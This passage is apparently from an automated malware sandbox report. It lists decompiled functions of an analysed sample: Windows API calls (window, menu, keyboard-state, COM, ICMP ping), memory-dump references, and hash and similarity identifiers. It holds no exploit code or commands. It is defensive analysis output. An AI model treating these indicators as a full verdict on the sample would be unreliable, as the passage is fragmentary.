                                                                                                                                  • Instruction Fuzzy Hash: 7251F660A047CC29FB35EBB288057AABBF45F01348F08559ED5C66B1C2DB549B8CC766
                                                                                                                                  Function 00EDFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00EDFB19
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00EDFB2B
                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EDFB89
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00EDFB94
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00EDFBA6
                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EDFBFC
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00EDFC0A
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00EDFC1B
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EDFC5E
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00EDFC6C
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EDFC89
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDFC96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                  • Opcode ID: 0a64d2b5390ea6f4e4e28c649ff6f9acaad6dff8f3676b4643e79c0b7f2fe2e8
                                                                                                                                  • Instruction ID: a1ee18adb80c961b2e45f2fd966d778034de39d68d036df2ea2dbdc8a895d82c
                                                                                                                                  • Opcode Fuzzy Hash: 0a64d2b5390ea6f4e4e28c649ff6f9acaad6dff8f3676b4643e79c0b7f2fe2e8
                                                                                                                                  • Instruction Fuzzy Hash: B2510171B00209AFDB18CF69DD95EAEBBBAEB88715F14813DF916E7290D7709D018B10
                                                                                                                                  Function 00EBB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00EBB067
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                  • Opcode ID: 273fedc602dcb434fff05d8ed2cfa2da362aa2152774b4f59bb9a4b5f6670ff7
                                                                                                                                  • Instruction ID: 701f6b50129bdb6891b65b42d11221f9fc4d08930e09963cf355bbd24eabc32e
                                                                                                                                  • Opcode Fuzzy Hash: 273fedc602dcb434fff05d8ed2cfa2da362aa2152774b4f59bb9a4b5f6670ff7
                                                                                                                                  • Instruction Fuzzy Hash: D941AD31500504EFDB306F28D899BFB3B66AB06735F184261FD759A1E2C7B18C42EB21
                                                                                                                                  Function 00EE7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 136442275-0
                                                                                                                                  • Opcode ID: 6bd54b9565f07e37c45659dbebab43c1e68f77be432ee6b714169b364b3700e5
                                                                                                                                  • Instruction ID: 3fe4f489b8735b8c3b36a1f813770803bd34b97699ca491cd3833a17e04cfdb7
                                                                                                                                  • Opcode Fuzzy Hash: 6bd54b9565f07e37c45659dbebab43c1e68f77be432ee6b714169b364b3700e5
                                                                                                                                  • Instruction Fuzzy Hash: F4412EB280416CAADF21EB50DD41EDE73FCAB48310F1051EAB519B2051EB31ABD5CF60
                                                                                                                                  Function 00EA84A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                  • __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EC2177: _xtow@16.LIBCMT ref: 00EC2198
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                                  • Opcode ID: d7120c8b645e414a1d4f9da94e94430c65cd8ba32571f6cb23037852f9e6acc7
                                                                                                                                  • Instruction ID: 9731dd8fe970148e6e610769e9eb622eeab6ad5e8a009e0bc30fb1b16e4572d3
                                                                                                                                  • Opcode Fuzzy Hash: d7120c8b645e414a1d4f9da94e94430c65cd8ba32571f6cb23037852f9e6acc7
                                                                                                                                  • Instruction Fuzzy Hash: 26415571900605DFDB24DB38D941FAAB7E5BF8D710F24446EE549EB181EA32EA82DB10
                                                                                                                                  Function 00EC5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EC5CCA
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00EC5D63
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00EC5D99
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00EC5DB6
                                                                                                                                  • __allrem.LIBCMT ref: 00EC5E0C
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC5E28
                                                                                                                                  • __allrem.LIBCMT ref: 00EC5E3F
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC5E5D
                                                                                                                                  • __allrem.LIBCMT ref: 00EC5E74
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC5E92
                                                                                                                                  • __invoke_watson.LIBCMT ref: 00EC5F03
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                  • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                  • Instruction ID: f3b57b64b899e71b49d6f2c31afd233eb702d1f704b745a4d226d4824a6b3987
                                                                                                                                  • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                  • Instruction Fuzzy Hash: AC71D773A01B16ABD7149B79CE41F9AB3E4EF10724F14522EE510F6681E771EA828B90
                                                                                                                                  Function 00EE57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5816
                                                                                                                                  • GetMenuItemInfoW.USER32(00F618F0,000000FF,00000000,00000030), ref: 00EE5877
                                                                                                                                  • SetMenuItemInfoW.USER32(00F618F0,00000004,00000000,00000030), ref: 00EE58AD
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00EE58BF
                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00EE5903
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00EE591F
                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00EE5949
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00EE598E
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EE59D4
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE59E8
                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE5A09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                  • Opcode ID: 987223861c42c506c1d82ed16f304358a01f551a77e457f7bfd7c87fd8c8077e
                                                                                                                                  • Instruction ID: e5b623a493bfd32e294ec315c99218b452134ca28ad6e2fe43d484d5c6ae64b6
                                                                                                                                  • Opcode Fuzzy Hash: 987223861c42c506c1d82ed16f304358a01f551a77e457f7bfd7c87fd8c8077e
                                                                                                                                  • Instruction Fuzzy Hash: 5361BDB290068DEFDF21CFA5C988AEE7BB8EB4131CF181529E551B7252D371AD01DB20
                                                                                                                                  Function 00F09A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F09AA5
                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F09AA8
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F09ACC
                                                                                                                                  • _memset.LIBCMT ref: 00F09ADD
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F09AEF
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F09B67
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                  • Opcode ID: 6ef95b677b3c9af6cc50769bcb06b0d0f9ea4784948898a496aa1fc535b231f0
                                                                                                                                  • Instruction ID: 1c858dce6fc9039c291c9790fc27e66cab52d75c85db09dde6491ab2df299556
                                                                                                                                  • Opcode Fuzzy Hash: 6ef95b677b3c9af6cc50769bcb06b0d0f9ea4784948898a496aa1fc535b231f0
                                                                                                                                  • Instruction Fuzzy Hash: 5B616A75A00208AFDB20DFA8CC81FEE77F8AB49710F144159FA14A72D2D7B4A941EB90
                                                                                                                                  Function 00EE3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE3591
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00EE3612
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00EE362D
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00EE3647
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00EE365C
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00EE3674
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00EE3686
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00EE369E
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00EE36B0
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00EE36C8
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00EE36DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: 199e7a9b40739d15b87abc2321daf72063f11f3b4694dd8e0cef652d23601dd7
                                                                                                                                  • Instruction ID: ff233a899e3f62f28043143631294fecda046b56b71f1f3b10b6ac2f6b91e6d2
                                                                                                                                  • Opcode Fuzzy Hash: 199e7a9b40739d15b87abc2321daf72063f11f3b4694dd8e0cef652d23601dd7
                                                                                                                                  • Instruction Fuzzy Hash: 9841C5645047CE7DFF30CB76881D3A5BAA16B1134CF085059D5C6673C2EBE49BC88B62
                                                                                                                                  Function 00EDA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00EDA2AA
                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00EDA2F5
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EDA307
                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EDA327
                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00EDA36A
                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EDA37E
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EDA393
                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00EDA3A0
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EDA3A9
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EDA3BB
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EDA3C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                  • Opcode ID: 35895cc8056d7b90c433195b866a9a420b5c6a964abaa18db04358ced5844d5e
                                                                                                                                  • Instruction ID: cec978c316c9b9afd2242eca8c8f2363cac09470a865d3b1375e92e291a24fb8
                                                                                                                                  • Opcode Fuzzy Hash: 35895cc8056d7b90c433195b866a9a420b5c6a964abaa18db04358ced5844d5e
                                                                                                                                  • Instruction Fuzzy Hash: 76415D3190021DAFCB14EFA4DC849DEBBB9FF48304F149069E501B7261DB31AA46DBA1
                                                                                                                                  Function 00EFB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • CoInitialize.OLE32 ref: 00EFB298
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EFB2A3
                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,00F2D8FC,?), ref: 00EFB303
                                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 00EFB376
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFB410
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EFB471
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                                  • Opcode ID: 3f2f9237161299d6b365aed905053ffe0bdb5d397ce385a6ac1f11dad6da2d1b
                                                                                                                                  • Instruction ID: 5a70b5941e5f71361ce1a73d642469d1823cae4493dfd9892eb15fe6cc41346a
                                                                                                                                  • Opcode Fuzzy Hash: 3f2f9237161299d6b365aed905053ffe0bdb5d397ce385a6ac1f11dad6da2d1b
                                                                                                                                  • Instruction Fuzzy Hash: 4B619C70604319AFD710DF54C984BAEB7E8AF88718F14141DFA85AB2A1D7B0ED49CB92
                                                                                                                                  Function 00EF8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00EF86F5
                                                                                                                                  • inet_addr.WS2_32(?), ref: 00EF873A
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00EF8746
                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00EF8754
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF87C4
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF87DA
                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EF884F
                                                                                                                                  • WSACleanup.WS2_32 ref: 00EF8855
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                  • String ID: Ping
                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                  • Opcode ID: d9099dc9134e4539aa92703d6648bc980f687f4cb0d02ab917c82d0fb2502f4c
                                                                                                                                  • Instruction ID: 4809ec374ad6e4ab4bb9df71fb6f3d884a4a11efac565c63e486033188d51c7b
                                                                                                                                  • Opcode Fuzzy Hash: d9099dc9134e4539aa92703d6648bc980f687f4cb0d02ab917c82d0fb2502f4c
